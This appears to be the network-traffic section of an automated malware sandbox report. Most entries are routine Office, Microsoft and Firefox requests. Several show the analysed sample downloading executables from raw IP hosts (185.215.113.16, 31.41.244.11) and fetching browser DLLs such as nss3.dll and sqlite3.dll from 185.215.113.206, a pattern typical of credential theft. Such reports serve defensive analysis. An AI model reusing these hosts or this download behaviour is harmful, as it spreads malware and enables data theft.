Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /files/freecam.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
